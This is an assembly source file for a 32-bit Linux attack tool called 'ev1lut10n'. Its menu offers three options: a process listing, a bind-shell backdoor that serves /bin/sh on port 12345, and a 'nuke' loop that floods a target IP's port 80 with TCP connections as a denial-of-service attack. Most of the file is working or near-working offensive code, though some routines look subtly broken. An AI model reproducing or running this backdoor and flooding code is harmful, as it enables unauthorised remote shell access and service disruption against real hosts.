;ev1lut10n Linux Utility for 32 bit linux
;programmer : ev1lut10n
;int-sec t00l pre-release
;thanks to: petimati,cakill,danzel,p4,x-hack,flyff666, motaro irhaby, fadli and all my bro
;nasm -f elf -g -F stabs ev1lut10n.asm -o ev1lut10n.o
;gcc -o ev1lut10n ev1lut10n.o
;website: http://www.jasaplus.com
;gopher: gopher://sdf.org/1/users/wisdomc0
;gopher: gopher://sdf.org/1/users/ev1lut10
global main
%define PF_INET 2
%define AF_INET PF_INET
%define SOCK_STREAM 1
%define INADDR_ANY 0
%define PORT 80
extern printf
extern scanf
extern socket
extern connect
extern htons
extern recv
extern send
extern close
extern inet_aton
section .bss
pilih_on_heap resb 256 ; beware my heap overflow
targetx: resw 50 ; beware my heap overflow
section .data
data db ".::ev1lut10n Linux Utility for linux x86 version 1.0::.",13,10
pjg_data equ $-data
c0d3r db "programmer : ev1lut10n",13,10
pjg_c0d3r equ $-c0d3r
;main menu
menu1 db "proc - show process",13,10
pjg_menu1 equ $-menu1
menu2 db "bind - bindshell backdoor on port 12345",13,10
pjg_menu2 equ $-menu2
menu3 db "nuke - nuk3 a target",13,10
pjg_menu3 equ $-menu3
;eof main menu
c0ns0l3 db "cmd:"
pjg_c0ns0l3 equ $-c0ns0l3
signed db "selected option:",13,10
pjg_signed equ $-signed
pilih db "%s", 0
;defining datas for gs.asm nuk3r
akhir db "-------------finished----------",13,10
pjg_akhir equ $ - akhir
banner db ".::gantung socket::.",13,10
pjg_banner equ $ - banner
tunggu db "..Boom..",13,10
pjg_tunggu equ $ - tunggu
programmer db "...:::programmer: ev1lut10n:::... ",13,10
pjg_programmer equ $ - programmer
fok db "-------------------------------------",13,10
pjg_fok equ $ - fok
kon_gagal db "[-] wtf dude ? failed at connect() ",13,10
warning db "warning !!! do not use hostname !!! use target ip address instead !!!",13,10
pjg_warning equ $ - warning
ask_target db "enter target ip address : ",0
target db "%s", 0
ask_loop db "enter target ip address : ",0
fd dd 0
struc sockaddr_in
.sin_family resw 1
.sin_port resw 1
.sin_addr resd 1
resb 8
endstruc
struktur istruc sockaddr_in
;eof gs.asm nuk3r
section .text
main:
jmp _ev1lut10n
_procedure_writeln:
push ebp
mov ebp,esp
mov ebx,0x1
mov eax,0x4
int 80h
;mov ah,09h
;mov dx,offset str1ng
;int 21h
mov esp,ebp
pop ebp
ret
_procedure_tampilan_proses:
push ebp
mov ebp,esp
xor eax,eax
xor ecx,ecx
xor edx,edx
push eax
push 0x73702f2f
push 0x6e69622f
mov ebx, esp
mov eax, 11
int 80h
mov esp,ebp
pop ebp
ret
;start socket operation without c library
__________ev1lut10n____________________bind12345:
push ebp
mov ebp,esp
push byte 2
pop eax
int 80h
mov esp,ebp
pop ebp
__________ev1lut10n____________________soket:
push ebp
mov ebp,esp
push byte 0x0
push byte 0x1
push byte 0x2
mov eax, 102
mov ebx, 0x1
mov ecx,esp
int 80h
mov edx, eax
mov esp,ebp
pop ebp
_________ev1lut10n_____________________binder:
push ebp
mov ebp,esp
push byte 0
push byte 0
push byte 0
push word 0x3930
push word 2
mov ebx, esp
push byte 16
push ebx
push edx
mov eax,102
mov ebx,2
mov ecx,esp
int 80h
mov esp,ebp
pop ebp
___________ev1lut10n___________________lisen:
push ebp
mov ebp,esp
push byte 0x1
push edx
mov eax,102
mov ebx,4
mov ecx,esp
int 80h
mov esp,ebp
pop ebp
__________ev1lut10n____________________acep:
push ebp
mov ebp,esp
push byte 0
push byte 0
push edx
mov eax,102
mov ebx,5
mov ecx,esp
int 80h
mov edx, eax
mov esp,ebp
pop ebp
___________ev1lut10n___________________siap_fd:
push ebp
mov ebp,esp
mov eax,63
mov ebx,edx
mov ebx,2
int 80h
mov eax,63
mov ebx,edx
mov ecx,1
int 80h
mov eax,63
mov ebx,edx
mov ecx,0
int 80h
mov esp,ebp
pop ebp
___________ev1lut10n___________________eksekusi:
push ebp
mov ebp,esp
push BYTE 11
pop eax
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push ecx
mov edx, esp
push ebx
mov ecx, esp
int 80h
mov esp,ebp
pop ebp
bersih2:
push ebp
mov ebp,esp
push byte 0x06
pop eax
int 80h
jmp keluar
mov esp,ebp
pop ebp
;eof socket operation without c library
;start stack op
pr3p4r3_gs_asm:
push ebp
mov ebp,esp
mov eax,10000
mov edx,pjg_fok
mov ecx,fok
call (_procedure_writeln)
mov edx,pjg_banner
mov ecx,banner
call (_procedure_writeln)
mov edx,pjg_programmer
mov ecx,programmer
call (_procedure_writeln)
mov edx,pjg_fok
mov ecx,fok
call (_procedure_writeln)
push dword ask_target
call printf
push dword targetx
push dword target
call scanf
while:
cmp eax,0
je finish
push dword 0
push dword SOCK_STREAM
push dword AF_INET
call socket
mov [fd], eax
mov word [struktur+sockaddr_in.sin_family], AF_INET
push dword (struktur + sockaddr_in.sin_addr)
push dword targetx
call inet_aton
push word PORT
call htons
mov word [struktur+sockaddr_in.sin_port], ax
push dword sockaddr_in_size
push dword struktur
push dword [fd]
call connect
mov edx,pjg_tunggu
mov ecx,tunggu
call (_procedure_writeln)
inc eax
jmp while
finish:
mov edx,pjg_akhir
mov ecx,akhir
call (_procedure_writeln)
mov esp,ebp
pop ebp
ret
_ev1lut10n:
push ebp
mov ebp,esp
mov edx,pjg_data
mov ecx,data
call (_procedure_writeln)
mov edx,pjg_c0d3r
mov ecx,c0d3r
call (_procedure_writeln)
mov edx,pjg_menu1
mov ecx,menu1
call (_procedure_writeln)
mov edx,pjg_menu2
mov ecx,menu2
call (_procedure_writeln)
mov edx,pjg_menu3
mov ecx,menu3
call (_procedure_writeln)
mov edx,pjg_c0ns0l3
mov ecx,c0ns0l3
call (_procedure_writeln)
;(gdb) x/s 0x8049268
;0x8049268 <pilih_on_heap>:
mov eax,3
mov ebx,0
mov ecx,pilih_on_heap
int 80h
push eax
mov eax,4
mov ebx,1
mov ecx,signed
mov edx,pjg_signed
int 80h
mov eax,4
mov ebx,1
mov ecx,pilih_on_heap
pop edx
int 80h
xor eax,eax
mov eax, dword [pilih_on_heap]
cmp eax,'proc'
je _procedure_tampilan_proses
cmp eax,'nuke'
je pr3p4r3_gs_asm
cmp eax,'bind'
je __________ev1lut10n____________________bind12345
jmp short keluar
mov esp,ebp
pop ebp
keluar:
nop
mov eax,0x01
int 80h
nop